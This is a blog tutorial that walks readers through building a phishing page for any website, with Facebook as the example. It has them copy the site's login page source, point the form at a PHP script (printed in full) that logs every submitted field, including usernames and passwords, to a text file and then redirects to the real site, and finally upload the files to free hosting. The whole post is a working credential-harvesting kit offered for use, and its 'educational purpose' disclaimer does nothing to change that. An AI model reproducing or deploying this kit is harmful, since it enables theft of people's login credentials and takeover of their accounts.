Breaking News

Tuesday 15 September 2020

How To Create Phishing Page For Any Website (Easy Tutorial)

 In this tutorial am gonna teach you how to create your own Phishing pages for your desired websites , this tutorial is very easy but you must have some patient with little skills to do 


Also Read: What Is Phishing and How To Secure Your Accounts from This attack


As you know phishing requires some coding knowledge such as HTML, CSS, JavaScript and little PHP , if you don't have any idea about it then its very difficult to create your own Phishing Page 

If you have at least the basics of HTML then follow this tutorial to create your own Phishing page else leave this tutorial its not for you 

How To Create  Phishing Page Step By Guide


In order To create your own phishing page you have to find your target website , I mean you have to get the website's login portal 

Mostly people search for How To create phishing page for Facebook , in Facebook the login portal is visible in the main page so here you need not to find out the login page 

Here am Not Confusing you by writing too much 

If you want to create  phishing page for a particular website then open the website in a good web browser such as chrome 

If you want to create phishing page for Facebook then open facebook.com 

Then right click on mouse you will see a Option view source code then click on it 

Or you can directly press CTRL+U to see the source code 

Most of the people search for How To Create Your phishing page with android Mobile , there is no Source code viewer option so how to do 

to view source code of any website you can search for online source code viewers

But in android you can type view-source: 
In front of url to see the source code 
Eg:

View-Source:www.facebook.com


Now Copy all the Source code starting from <html> to the end tag of </html> 

Now open Notepad and paste the copied codes 

Now find the tag <form action="

And replace login.php in action 

Eg:

<form action="login.php"

Now save the file as index.html

In android you can use droid edit app to edit html  files 

copy below code and save it as
login.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("users.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You can change facebook.com with any url 

Now create another file 

Don't write anything just save as users.txt  

Now you have all Done 

Just upload all the files ( index.html, login.php and users.txt )to a free web hosting server and make sure you give chmod 777 permission to users.text file

Finally This tutorial is only for educational purpose , we are not responsible for any misuse

0 comments:

Post a Comment

'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();
'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();